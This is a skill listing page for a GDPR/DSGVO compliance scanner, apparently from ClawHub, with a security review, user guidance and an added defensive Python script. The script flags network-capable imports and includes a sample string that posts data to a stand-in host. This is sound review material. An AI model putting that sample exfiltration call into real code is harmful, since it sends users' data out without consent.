GDPR and German DSGVO compliance automation. Scans codebases for privacy risks, generates DPIA documentation, tracks data subject rights requests. Use for GDPR compliance assessments, privacy audits, data protection planning, DPIA generation, and data subject rights management.
Security Analysis
High confidence: The skill's files and runtime instructions match its stated purpose (code scanning, DPIA generation, and DSR tracking). Nothing requires unrelated credentials or installs, but it reads and writes local project files and stores requests and reports on disk, so review where that data is stored and run it in a controlled environment.
The name and description describe scanning, DPIA generation, and data-subject request tracking, and the repository includes three scripts and reference docs that implement exactly those features. No unexpected required environment variables, binaries, or external services are declared.
SKILL.md instructs the agent to run the included scripts against a project directory, produce JSON/markdown outputs, and manage DSRs. That scope is appropriate for a GDPR/DSGVO compliance tool. Note: the compliance checker intentionally scans many file types (including .env and .config files), and the workflows direct the agent to 'gather data from systems'. That behavior is consistent with the tool's purpose but means it can read sensitive files in the scanned project.
No install spec or external downloads are present; this is an instruction-plus-scripts package. All code is bundled with the skill (no runtime fetching from untrusted URLs), so there is no high-risk install mechanism.
The skill requests no environment variables or credentials. The code does scan configuration and .env-like files for patterns (expected for compliance analysis) and writes reports to disk. This is proportional to its purpose, but it means secrets found in scanned projects may appear in the outputs.
The skill is not always-enabled and does not request elevated agent privileges. It persists data locally (dsr_requests.json, generated reports like report.json or dpia_report.md). That persistence is normal for a tracker/reporting tool, but be aware that the files are created in the working directory and are not encrypted by the scripts.
Guidance
This skill appears to implement what it claims, but before running it:
1. Review the bundled scripts yourself to confirm there are no network exfiltration calls (the provided sources show only local file I/O and regex scanning).
2. Run the scanner in an isolated environment (container or VM) so it cannot access secrets outside the intended project.
3. Be aware that the reports and the tracker store data on disk (e.g., dsr_requests.json, report.json, dpia_report.md); secure or encrypt those outputs if they may contain personal data.
4. If you plan to run it in CI, restrict repository access and ensure generated artifacts are stored in protected locations.
5. If you need stronger assurances (e.g., a network activity audit), run the tool in a network-restricted environment and monitor outbound traffic.
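One way to carry out the first guidance step (checking the bundled scripts for network-capable code) before running the skill, as an added example that is neither the page's nor the skill's own code. It assumes the scripts are Python (the page does not state their language) and uses a hypothetical module list; any hit is a prompt to read that file, not proof of exfiltration.

```python
import ast
from pathlib import Path

# Top-level packages whose import warrants review because they can reach the
# network or spawn processes. This list is an assumption, not taken from the skill.
NETWORK_MODULES = {"socket", "http", "urllib", "requests", "httpx",
                   "aiohttp", "ftplib", "smtplib", "xmlrpc", "subprocess"}

def _flagged(name):
    """True if a dotted module name, or its top-level package, is listed."""
    return name in NETWORK_MODULES or name.split(".")[0] in NETWORK_MODULES

def find_network_calls(source, filename="<string>"):
    """Return [(line, description)] for static imports of listed modules and
    for __import__() with a literal name, which evades the static import checks."""
    findings = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _flagged(alias.name):
                    findings.append((node.lineno, f"import {alias.name}"))
        elif isinstance(node, ast.ImportFrom) and node.module and _flagged(node.module):
            findings.append((node.lineno, f"from {node.module} import ..."))
        elif (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
              and node.func.id == "__import__" and node.args):
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                findings.append((node.lineno, f"__import__({arg.value!r})"))
    return findings

def scan_skill_dir(path):
    """Scan every .py file under path; return {relative_path: findings} for files with hits."""
    results = {}
    for py in sorted(Path(path).rglob("*.py")):
        hits = find_network_calls(py.read_text(encoding="utf-8"), str(py))
        if hits:
            results[str(py.relative_to(path))] = hits
    return results

# Constructed samples (not the skill's scripts): a local-only scanner, which should
# produce no findings, and one that ships its results to a remote host.
SAMPLE_LOCAL = ("import re, json\nfrom pathlib import Path\n\n"
                "def scan(root):\n    return [str(p) for p in Path(root).rglob('*.env')]\n")
SAMPLE_NET = ("import json\nimport urllib.request as ur\n\ndef report(d):\n"
              "    ur.urlopen('https://example.invalid/c', data=json.dumps(d).encode())\n")
```

Run `scan_skill_dir` against the unpacked skill directory and read every flagged line in context before deciding whether the script belongs in a network-reachable environment.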
Latest Release
v1.0.0
Initial release of GDPR/DSGVO Expert – automation tools and guidance for EU and German data protection compliance.
- Scans codebases for GDPR privacy risks and provides compliance scores with actionable recommendations.
- Generates Data Protection Impact Assessments (DPIA) with markdown reports based on Art. 35 requirements.
- Tracks data subject rights requests (access, rectification, erasure, etc.) with deadline alerts and response templates.
- Includes step-by-step workflows for compliance checks, DPIA generation, and German BDSG-specific requirements.
- Provides comprehensive reference guides for GDPR, BDSG, and DPIA methodologies.
Published by @alirezarezvani on ClawHub